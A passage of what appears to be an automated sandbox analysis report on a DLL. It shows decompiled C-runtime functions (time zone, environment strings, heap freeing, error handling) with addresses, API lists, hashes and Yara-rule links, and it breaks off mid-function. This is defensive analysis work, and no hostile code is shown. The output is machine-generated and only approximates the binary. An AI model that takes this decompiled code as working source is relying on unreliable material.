    • Instruction Fuzzy Hash: 6C512676A0460DAFEB11CFA9CC40AEA73FBEF59325B10055DE949D7290E731DA44CB40
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E2131DE, Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON
    Download Yara Rule
    C-Code - Quality: 63%
    			E6E2131DE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				void* _t83;
				signed int _t85;
				void* _t87;
				signed int _t88;
				signed int _t90;
				int _t94;
				char** _t97;
				signed int _t101;
				signed int _t102;
				signed int _t107;
				signed int _t108;
				intOrPtr _t117;
				intOrPtr _t119;

				_t89 = __edi;
				_t97 = E6E212C48();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E6E212CA6( &_v8);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E208956();
					asm("int3");
					_t107 = _t108;
					_t38 =  *0x6e24b164; // 0x1dc3c76f
					_v56 = _t38 ^ _t107;
					 *0x6e24b474 =  *0x6e24b474 | 0xffffffff;
					 *0x6e24b468 =  *0x6e24b468 | 0xffffffff;
					_push(0);
					_push(_t97);
					_t90 = 0;
					 *0x6e2e38c8 = 0;
					_t42 = E6E21D077(_t78, _t87, __eflags,  &_v316,  &_v312, 0x100, 0x6e23ffb4);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t102 = E6E20FBEC(_t78, _v272);
							_pop(_t83);
							__eflags = _t102;
							if(__eflags != 0) {
								_t50 = E6E21D077(_t83, _t87, __eflags,  &_v276, _t102, _v272, 0x6e23ffb4);
								__eflags = _t50;
								if(_t50 == 0) {
									E6E20FBB2(0);
									_t90 = _t102;
								} else {
									_push(_t102);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								E6E20FBB2();
							}
						}
					} else {
						_t90 =  &_v268;
					}
					asm("sbb esi, esi");
					_t101 =  ~(_t90 -  &_v268) & _t90;
					__eflags = _t90;
					if(__eflags == 0) {
						L33:
						E6E2131DE(0x6e23ffb4, _t90, _t101, __eflags);
					} else {
						__eflags =  *_t90;
						if(__eflags == 0) {
							goto L33;
						} else {
							_push(_t90);
							E6E213009(0x6e23ffb4, _t90, _t101, __eflags);
						}
					}
					E6E20FBB2(_t101);
					__eflags = _v12 ^ _t107;
					return E6E203D51(_v12 ^ _t107);
				} else {
					_t54 = E6E212C4E( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E6E212C7A( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E6E20FBB2( *0x6e2e38c4);
							 *0x6e2e38c4 = 0;
							 *_t108 = 0x6e2e38d0;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x6e2e38d0 * 0x3c;
								_t88 =  *0x6e2e3924; // 0x0
								_push(__edi);
								 *0x6e2e38c8 = 1;
								_v8 = _t85;
								_t117 =  *0x6e2e3916; // 0x0
								if(_t117 != 0) {
									_v8 = _t85 + _t88 * 0x3c;
								}
								_t119 =  *0x6e2e396a; // 0x0
								if(_t119 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x6e2e3978; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t88) * 0x3c;
									}
								}
								_t94 = E6E20B6F0(0, _t88);
								if(WideCharToMultiByte(_t94, 0, 0x6e2e38d4, 0xffffffff,  *_t97, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t97) = 0;
								} else {
									( *_t97)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t94, 0, 0x6e2e3928, 0xffffffff, _t97[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t97[1]) = 0;
								} else {
									_t97[1][0x3f] = 0;
								}
							}
							 *(E6E212C42()) = _v8;
							 *(E6E212C36()) = _v12;
							_t61 = E6E212C3C();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}




































    0x6e2131de
    0x6e2131ed
    0x6e2131f4
    0x6e2131f8
    0x6e2131fb
    0x6e2131fe
    0x6e213203
    0x6e213206
    0x6e21332e
    0x6e21332e
    0x6e21332f
    0x6e213330
    0x6e213331
    0x6e213332
    0x6e213333
    0x6e213338
    0x6e21333c
    0x6e213344
    0x6e21334b
    0x6e21334e
    0x6e21335b
    0x6e213362
    0x6e213363
    0x6e21336a
    0x6e213379
    0x6e213380
    0x6e213388
    0x6e21338a
    0x6e213394
    0x6e213397
    0x6e2133a4
    0x6e2133a6
    0x6e2133a7
    0x6e2133a9
    0x6e2133c2
    0x6e2133ca
    0x6e2133cc
    0x6e2133d2
    0x6e2133d7
    0x6e2133ce
    0x6e2133ce
    0x00000000
    0x6e2133ce
    0x6e2133ab
    0x6e2133ab
    0x6e2133ac
    0x6e2133ac
    0x6e2133ac
    0x6e2133d9
    0x6e21338c
    0x6e21338c
    0x6e21338c
    0x6e2133e6
    0x6e2133e8
    0x6e2133ea
    0x6e2133ec
    0x6e2133fc
    0x6e2133fc
    0x6e2133ee
    0x6e2133ee
    0x6e2133f1
    0x00000000
    0x6e2133f3
    0x6e2133f3
    0x6e2133f4
    0x6e2133f9
    0x6e2133f1
    0x6e213402
    0x6e21340d
    0x6e213418
    0x6e21320c
    0x6e213210
    0x6e213215
    0x6e213218
    0x00000000
    0x6e21321e
    0x6e213222
    0x6e213227
    0x6e21322a
    0x00000000
    0x6e213230
    0x6e213236
    0x6e21323b
    0x6e213241
    0x6e213251
    0x6e213257
    0x6e21325e
    0x6e213264
    0x6e213268
    0x6e21326e
    0x6e213271
    0x6e213278
    0x6e21327f
    0x6e21327f
    0x6e213282
    0x6e213289
    0x6e2132a1
    0x6e2132a1
    0x6e2132a4
    0x6e21328b
    0x6e21328b
    0x6e213292
    0x00000000
    0x6e213294
    0x6e213296
    0x6e21329c
    0x6e21329c
    0x6e213292
    0x6e2132ac
    0x6e2132c8
    0x6e2132d8
    0x6e2132cf
    0x6e2132d1
    0x6e2132d1
    0x6e2132f6
    0x6e213308
    0x6e2132fd
    0x6e213300
    0x6e213300
    0x6e2132f6
    0x6e213312
    0x6e21331c
    0x6e213321
    0x6e213326
    0x6e21332d
    0x6e21332d
    0x6e21322a
    0x6e213218

    APIs
    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E23FFB4), ref: 6E213248
    • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2E38D4,000000FF,00000000,0000003F,00000000,?,?), ref: 6E2132C0
    • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2E3928,000000FF,?,0000003F,00000000,?), ref: 6E2132ED
    • _free.LIBCMT ref: 6E213236
      • Part of subcall function 6E20FBB2: HeapFree.KERNEL32(00000000,00000000,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4), ref: 6E20FBC8
      • Part of subcall function 6E20FBB2: GetLastError.KERNEL32(6E1F73C4,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4,6E1F73C4), ref: 6E20FBDA
    • _free.LIBCMT ref: 6E213402
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
    • String ID:
    • API String ID: 1286116820-0
    • Opcode ID: 02756c1b6f7c4285d0731717c323811f3f30e04ee3a96e59ee8d8e556c3b6e68
    • Instruction ID: 096777a788422985b358e902b10ed29a5456707b02e25bd6244022891d03a2f8
    • Opcode Fuzzy Hash: 02756c1b6f7c4285d0731717c323811f3f30e04ee3a96e59ee8d8e556c3b6e68
    • Instruction Fuzzy Hash: 2A51E77590811EEBDB00DFE98D489EEB7FFBF46711B52055AE61497290DB308B40CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20E8AA, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
    Download Yara Rule
    C-Code - Quality: 83%
    			E6E20E8AA(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x6e24b164; // 0x1dc3c76f
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E6E20E76B( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E6E20410A(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E6E20410A(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E6E20410A(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E6E219546(_t56);
						_t40 = E6E20FBB2(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E6E219546(_t56);
						E6E20FBB2(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x6e24b164;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























    0x6e20e8aa
    0x6e20e8b4
    0x6e20e8b8
    0x6e20e8ba
    0x6e20e8be
    0x6e20e8c8
    0x6e20e8d9
    0x6e20e8de
    0x6e20e8e0
    0x6e20e8e2
    0x6e20e8e4
    0x6e20e8e6
    0x6e20e8ea
    0x6e20e9a4
    0x6e20e9b2
    0x6e20e9b4
    0x6e20e9b9
    0x6e20e9c0
    0x6e20e9c2
    0x6e20e9d0
    0x6e20e9df
    0x6e20e9e2
    0x6e20e9e4
    0x00000000
    0x6e20e9e5
    0x6e20e8f2
    0x6e20e8f7
    0x6e20e8fc
    0x6e20e8fe
    0x6e20e8fe
    0x6e20e900
    0x6e20e905
    0x6e20e909
    0x6e20e909
    0x6e20e90c
    0x6e20e92b
    0x6e20e92b
    0x6e20e92d
    0x6e20e930
    0x6e20e939
    0x6e20e93c
    0x6e20e941
    0x6e20e944
    0x6e20e949
    0x00000000
    0x00000000
    0x6e20e94b
    0x00000000
    0x6e20e90e
    0x6e20e90e
    0x6e20e910
    0x6e20e919
    0x6e20e91c
    0x6e20e921
    0x6e20e924
    0x6e20e929
    0x6e20e953
    0x6e20e956
    0x6e20e958
    0x6e20e95b
    0x6e20e963
    0x6e20e969
    0x6e20e970
    0x6e20e972
    0x6e20e97a
    0x6e20e989
    0x6e20e98d
    0x6e20e98f
    0x6e20e992
    0x00000000
    0x00000000
    0x6e20e994
    0x6e20e997
    0x6e20e999
    0x6e20e999
    0x6e20e99a
    0x6e20e99c
    0x6e20e99f
    0x00000000
    0x6e20e999
    0x00000000
    0x6e20e929
    0x6e20e90c
    0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: ca629277efd088683e5d93b6e801e409d9f002d42c3e9e1e608eedfe0ef6d9eb
    • Instruction ID: 6a4a4aa03f4e931cb2b15f10f7255bdd7b344032e497ca0cff4e9af47996c9e8
    • Opcode Fuzzy Hash: ca629277efd088683e5d93b6e801e409d9f002d42c3e9e1e608eedfe0ef6d9eb
    • Instruction Fuzzy Hash: F641F236A003089FDB10DFB8C880A9EB3F7FF89714B1585A9E515EB384DB30A941CB80
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E219178, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
    Download Yara Rule
    C-Code - Quality: 93%
    			E6E219178() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E6E219141(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E6E20FBEC(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E6E20FBB2(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












    0x6e219187
    0x6e21918d
    0x6e2191e5
    0x6e2191e5
    0x6e21918f
    0x6e219190
    0x6e219195
    0x6e21919e
    0x6e2191a4
    0x6e2191aa
    0x6e2191af
    0x00000000
    0x6e2191b1
    0x6e2191b7
    0x6e2191bc
    0x6e2191da
    0x6e2191d4
    0x6e2191d4
    0x6e2191d6
    0x6e2191d6
    0x6e2191dd
    0x6e2191e2
    0x6e2191af
    0x6e2191e9
    0x6e2191ec
    0x6e2191ec
    0x6e2191fa

    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 6E219181
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E2191A4
      • Part of subcall function 6E20FBEC: HeapAlloc.KERNEL32(00000000,0000060B,?,?,6E203D1F,0000060B,?,6E1F73C4,0000060B), ref: 6E20FC1E
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6E2191CA
    • _free.LIBCMT ref: 6E2191DD
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E2191EC
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
    • String ID:
    • API String ID: 2278895681-0
    • Opcode ID: bd68b3290419eeb01a16674aee8dc8b3a497c01cfc74989f1a7172a8ebbc79a9
    • Instruction ID: c7f628c2afb664d37e12c1db949b6c7e61fea5115ad95b1961a996d80e281fa1
    • Opcode Fuzzy Hash: bd68b3290419eeb01a16674aee8dc8b3a497c01cfc74989f1a7172a8ebbc79a9
    • Instruction Fuzzy Hash: 3401D87660565F7F3B1105FA5C8CCFB2AEFDEC7A513140119FE14C6100EAA18E51C170
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20FA8A, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
    Download Yara Rule
    C-Code - Quality: 82%
    			E6E20FA8A(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x6e24b2d0; // 0xffffffff
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E6E20FB55(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E6E213908(_t13, _t16, __eflags,  *0x6e24b2d0, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E6E20F84C(_t13, _t15, 0x6e2e36a8);
							E6E20FBB2(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E6E20FBB2();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E6E2138B2(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}











    0x6e20fa8a
    0x6e20fa95
    0x6e20fa97
    0x6e20fa99
    0x6e20fa9e
    0x6e20faa1
    0x6e20faaf
    0x6e20fabb
    0x6e20fabe
    0x6e20fac1
    0x6e20fad3
    0x6e20fad8
    0x6e20fada
    0x6e20fae5
    0x6e20faeb
    0x6e20faf3
    0x6e20faf5
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e20fadc
    0x6e20fadc
    0x00000000
    0x6e20fadc
    0x6e20fac3
    0x6e20fac3
    0x6e20fac4
    0x6e20fac4
    0x6e20faf7
    0x6e20faf8
    0x6e20faf8
    0x6e20faa3
    0x6e20faa9
    0x6e20faad
    0x6e20fb00
    0x6e20fb01
    0x6e20fb07
    0x00000000
    0x00000000
    0x00000000
    0x6e20faad
    0x6e20fb0e

    APIs
    • GetLastError.KERNEL32(?,0000060B,?,6E20BB83,6E20FC2F,?,?,6E203D1F,0000060B,?,6E1F73C4,0000060B), ref: 6E20FA8F
    • _free.LIBCMT ref: 6E20FAC4
    • _free.LIBCMT ref: 6E20FAEB
    • SetLastError.KERNEL32(00000000,6E1F73C4,0000060B), ref: 6E20FAF8
    • SetLastError.KERNEL32(00000000,6E1F73C4,0000060B), ref: 6E20FB01
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast$_free
    • String ID:
    • API String ID: 3170660625-0
    • Opcode ID: 4c9418cae19e89020d0b282a2019c5570f0b3e3b778efeac131c68b774f1645f
    • Instruction ID: adf865a5081624ec45737dfd83e301d089c0d8cb61823e7f4518cc70b896a87b
    • Opcode Fuzzy Hash: 4c9418cae19e89020d0b282a2019c5570f0b3e3b778efeac131c68b774f1645f
    • Instruction Fuzzy Hash: EC01263A1D8A0E7FA702A6F54C68E8F253FABC636AB350025F815962C4EF6088048478
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21B44A, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E21B44A(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6e24b1a8; // 0x6e24b1a0
					if(_t23 != 0) {
						E6E20FBB2(_t7);
					}
					_t2 = _t21 + 4; // 0x558bf845
					_t24 =  *_t2 -  *0x6e24b1ac; // 0x6e2e3408
					if(_t24 != 0) {
						E6E20FBB2(_t8);
					}
					_t3 = _t21 + 8; // 0xec5589f8
					_t25 =  *_t3 -  *0x6e24b1b0; // 0x6e2e3408
					if(_t25 != 0) {
						E6E20FBB2(_t9);
					}
					_t4 = _t21 + 0x30; // 0x727d77e8
					_t26 =  *_t4 -  *0x6e24b1d8; // 0x6e24b1a4
					if(_t26 != 0) {
						E6E20FBB2(_t10);
					}
					_t5 = _t21 + 0x34; // 0xfc458b0e
					_t6 =  *_t5;
					_t27 = _t6 -  *0x6e24b1dc; // 0x6e2e340c
					if(_t27 != 0) {
						return E6E20FBB2(_t6);
					}
				}
				return _t6;
			}










    0x6e21b450
    0x6e21b455
    0x6e21b459
    0x6e21b45f
    0x6e21b462
    0x6e21b467
    0x6e21b468
    0x6e21b46b
    0x6e21b471
    0x6e21b474
    0x6e21b479
    0x6e21b47a
    0x6e21b47d
    0x6e21b483
    0x6e21b486
    0x6e21b48b
    0x6e21b48c
    0x6e21b48f
    0x6e21b495
    0x6e21b498
    0x6e21b49d
    0x6e21b49e
    0x6e21b49e
    0x6e21b4a1
    0x6e21b4a7
    0x00000000
    0x6e21b4af
    0x6e21b4a7
    0x6e21b4b2

    APIs
    • _free.LIBCMT ref: 6E21B462
      • Part of subcall function 6E20FBB2: HeapFree.KERNEL32(00000000,00000000,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4), ref: 6E20FBC8
      • Part of subcall function 6E20FBB2: GetLastError.KERNEL32(6E1F73C4,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4,6E1F73C4), ref: 6E20FBDA
    • _free.LIBCMT ref: 6E21B474
    • _free.LIBCMT ref: 6E21B486
    • _free.LIBCMT ref: 6E21B498
    • _free.LIBCMT ref: 6E21B4AA
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 69090cf46e1c34b42d22a70b559c58b5fab9cf5be1f12e87e9b36755ccdf08b0
    • Instruction ID: 56f5077b8284e1f1e6604d9257ecb909be50d494232651c522dcf3aac47728b9
    • Opcode Fuzzy Hash: 69090cf46e1c34b42d22a70b559c58b5fab9cf5be1f12e87e9b36755ccdf08b0
    • Instruction Fuzzy Hash: 07F0447644860DDB9F60EEE8D4A5C8B33FFAA09315764CC05E519D7744CB30F8808AB4
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E218496, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
    Download Yara Rule
    C-Code - Quality: 66%
    			E6E218496(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E6E20E35B(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E6E21D133(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
